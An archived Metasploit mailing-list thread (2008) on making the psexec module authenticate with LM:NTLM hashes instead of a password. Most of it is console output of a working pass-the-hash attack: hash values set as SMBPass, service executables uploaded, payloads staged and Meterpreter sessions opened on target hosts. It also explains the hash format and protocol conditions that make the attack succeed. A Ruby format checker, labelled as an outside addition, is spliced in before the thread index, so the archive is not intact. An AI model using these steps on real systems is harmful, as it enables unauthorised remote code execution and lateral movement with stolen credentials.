Metasploit mailing list archives
Using LM and NTLM Hashes with Metasploit's psexec
From: mathewbrown at fastmail.fm (Mathew Brown)
Date: Sat, 12 Apr 2008 11:53:49 -0700
Thanks Kurt, I was able to get it to work using Metasploit v3.1 although v3.0 gives me the following error:

    msf exploit(psexec) > exploit
    [*] Started reverse handler
    [*] Connecting to the server...
    [*] Authenticating as user 'Administrator'...
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, the meterpreter exploit is only giving me the core api and not the stdapi when using v3.1. Here's an example of the output:

    msf exploit(psexec) > exploit
    [*] Started reverse handler
    [*] Connecting to the server...
    [*] Authenticating as user 'Administrator'...
    [*] Uploading payload...
    [*] Created \hAKmOasU.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (KSpLNIZa - "MzGErdEaSogkoVTptHmQWyOovKyS")...
    [*] Closing service handle...
    [*] Opening service...
    [*] You *MUST* manually remove the service: (KSpLNIZa - "MzGErdEaSogkoVTptHmQWyOovKyS")
    [*] You *MUST* manually delete the service file: %SYSTEMROOT%\hAKmOasU.exe
    [*] Starting the service...
    [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
    [*] Sending stage (2834 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (81931 bytes)...
    [*] Upload completed.
    [*] Error: no response from dcerpc service
    [*] Meterpreter session 1 opened (192.168.192.1:4444 -> 192.168.192.132:1033)

    msf exploit(psexec) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > help

    Core Commands
    =============

        Command       Description
        -------       -----------
        ?             Help menu
        channel       Displays information about active channels
        close         Closes a channel
        exit          Terminate the meterpreter session
        help          Help menu
        interact      Interacts with a channel
        irb           Drop into irb scripting mode
        migrate       Migrate the server to another process
        quit          Terminate the meterpreter session
        read          Reads data from a channel
        run           Executes a meterpreter script
        use           Load a one or more meterpreter extensions
        write         Writes data to a channel

    meterpreter >

I tried using stdapi but it didn't work:

    meterpreter > use stdapi
    Loading extension stdapi...[-] failure: Broken pipe
    ./lib/rex/io/stream.rb:40:in `syswrite'
    ./lib/rex/io/stream.rb:40:in `write'
    ./lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'
    ./lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response'
    ./lib/rex/post/meterpreter/client_core.rb:114:in `load_library'
    ./lib/rex/post/meterpreter/client_core.rb:156:in `use'
    ./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:249:in `cmd_use'
    ./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in `each'
    ./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in `cmd_use'
    ./lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    ./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    ./lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
    ./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    ./lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    ./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    ./lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
    ./lib/rex/ui/text/shell.rb:121:in `call'
    ./lib/rex/ui/text/shell.rb:121:in `run'
    ./lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
    ./lib/msf/base/sessions/meterpreter.rb:170:in `_interact'
    ./lib/rex/ui/interactive.rb:48:in `interact'
    ./lib/msf/ui/console/command_dispatcher/core.rb:722:in `cmd_sessions'
    ./lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    ./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    ./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    ./lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    ./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    ./lib/rex/ui/text/shell.rb:125:in `run'
    ./msfconsole:77

Any ideas? Thanks.

On Sat, 12 Apr 2008 09:24:54 -0700, "Kurt Grutzmacher" <grutz at jingojango.net> said:

The format is LM:NTLM and the only way the library knows is by looking for two 32-byte characters separated with a colon. What was the source of the hashes? Any pass-the-hash technique must have the direct PW->Hash result, anything that has been encrypted further with a nonce won't work. Also, NTLMv2 is not yet supported so your target must negotiate to NTLMv1.

I just tried it against a Win2K3 server green install without a problem:

    msf exploit(psexec) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
    SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
    msf exploit(psexec) > exploit
    [*] Started bind handler
    [*] Connecting to the server...
    [*] Authenticating as user 'Administrator'...
    [*] Uploading payload...
    [*] Created \tCmiQnDv.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")...
    [*] Closing service handle...
    [*] Opening service...
    [*] You *MUST* manually remove the service: (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")
    [*] You *MUST* manually delete the service file: %SYSTEMROOT%\tCmiQnDv.exe
    [*] Starting the service...
    [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
    [*] Sending stage (2834 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (81931 bytes)...
    [*] Upload completed.
    [*] Error: no response from dcerpc service
    [*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555)
    msf exploit(psexec) >

Kurt

On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm> wrote:

Hi HD,

Thank you for your reply, but I can't seem to get it to work. Also, where would I get the NTLM response from? I currently have the LM and NTLM hashes, not responses. I tried setting it to the LM:NTLM hash but it failed. I then tried it with just the NTLM hash and it also failed. Finally, I tried it in the :NTLM: format and it failed. Here's an example of what it tells me (the hash isn't really important since it's a test machine):

    msf exploit(psexec) > set SMBPass ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
    SMBPass => ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
    msf exploit(psexec) > exploit
    [*] Started reverse handler
    [*] Connecting to the server...
    [*] Authenticating as user 'Administrator'...
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

    msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
    SMBPass => b9d2d4957b330b503cc792eb6a55bb1
    msf exploit(psexec) > exploit
    [*] Started reverse handler
    [*] Connecting to the server...
    [*] Authenticating as user 'Administrator'...
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

    msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
    msf exploit(psexec) > exploit
    [*] Started reverse handler
    [*] Connecting to the server...
    [*] Authenticating as user 'Administrator'...
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, how would psexec differentiate between you sending it an NTLM hash to use for authentication and you sending it a password? In the example above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f? How would psexec know that this was an NTLM hash and not a password? Any ideas? Thanks for your help.

PS. I'm currently running Metasploit v3.1. After the failed attempts above, I verified that psexec works fine when I provide it with the real password and not the LM or NTLM hashes.

On Friday 11 April 2008, H D Moore wrote:

I think you can just set SMBPass to the NTLM response and call it done (thanks grutz!).

-HD

On Friday 11 April 2008, Mathew Brown wrote:

Hi,

After running info windows/smb/psexec in metasploit, it tells me: "This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload." I currently have the LM and NTLM hashes for a valid account on a remote machine but not the actual password. How would I pass this information to the SMBPass variable? Should I just put it as LM:HASH? Thanks.

-- 
Mathew Brown
mathewbrown at fastmail.fm

-- 
Mathew Brown
mathewbrown at fastmail.fm
-- 
http://www.fastmail.fm - The professional email service

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework

-- 
Mathew Brown
mathewbrown at fastmail.fm
-- 
http://www.fastmail.fm - Does exactly what it says on the tin
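Added example, not Metasploit's own code and not posted by anyone in this thread: a small Ruby checker that applies the rule Kurt states (two 32-character hexadecimal strings, i.e. the 16-byte LM and NT hashes, joined by a single colon) to an SMBPass value and reports why a value is not accepted as a hash pair. Under that rule, Mathew's question about how psexec tells a hash from a password has a simple answer: anything that does not match the exact pattern is treated as a plaintext password, which is also what the `::LM:NTLM:::` and `:NTLM:` forms tried above fall into. The function names, the regular expression and the sample values are this example's assumptions.

```ruby
# Added example, not Metasploit's code: classify an SMBPass value the way the
# thread describes the library doing it. An LM hash and an NT hash are each
# 16 bytes, written as 32 hexadecimal characters; the accepted form is LM:NTLM.
# Names, the pattern and the sample values below are this example's assumptions.

LM_NTLM_PATTERN = /\A([0-9a-fA-F]{32}):([0-9a-fA-F]{32})\z/

# Returns {kind: :hash, lm:, ntlm:} when the value is exactly two 32-hex-digit
# strings joined by one colon; otherwise {kind: :password, value:}, because
# anything that does not match the pattern is taken to be a plaintext password.
def classify_smbpass(value)
  m = LM_NTLM_PATTERN.match(value)
  return { kind: :password, value: value } unless m
  { kind: :hash, lm: m[1].downcase, ntlm: m[2].downcase }
end

# Lists the reasons a value fails the LM:NTLM check (empty array if it passes),
# covering the mistakes seen in the thread: surrounding colons, a missing LM
# half, a hash that is one character short, or non-hex characters.
def hash_format_problems(value)
  problems = []
  parts = value.split(':', -1)
  unless parts.size == 2
    problems << "expected exactly one ':' between LM and NTLM, found #{parts.size - 1}"
    return problems
  end
  lm, ntlm = parts
  problems << "LM half is #{lm.length} characters, expected 32" unless lm.length == 32
  problems << "NTLM half is #{ntlm.length} characters, expected 32" unless ntlm.length == 32
  problems << "non-hex characters present" unless parts.all? { |p| p =~ /\A[0-9a-fA-F]*\z/ }
  problems
end

# Constructed sample values (not real credentials) in the shapes tried in the thread.
SAMPLES = {
  'LM:NTLM, correct form'         => '0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210',
  'NTLM only, no colon'           => 'fedcba9876543210fedcba9876543210',
  ':NTLM: with empty LM half'     => ':fedcba9876543210fedcba9876543210:',
  'extra colons around the pair'  => '::0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::',
  'NTLM half one character short' => '0123456789abcdef0123456789abcdef:fedcba9876543210fedcba987654321',
  'plaintext password'            => 'Passw0rd!',
}

if __FILE__ == $0
  SAMPLES.each do |label, value|
    result = classify_smbpass(value)
    puts "#{label}: treated as #{result[:kind]}"
    hash_format_problems(value).each { |p| puts "  - #{p}" }
  end
end
```

Running the script prints one line per sample saying whether the value would be used as a hash pair or as a password, followed by the specific format problem for the rejected ones. Note that this only checks the shape of the string; as Kurt points out, a value in the right shape still has to be the direct password-to-hash result rather than a nonce-encrypted response, and the server has to negotiate NTLMv1.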
Current thread:
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec H D Moore (Apr 11)
- <Possible follow-ups>
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 13)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)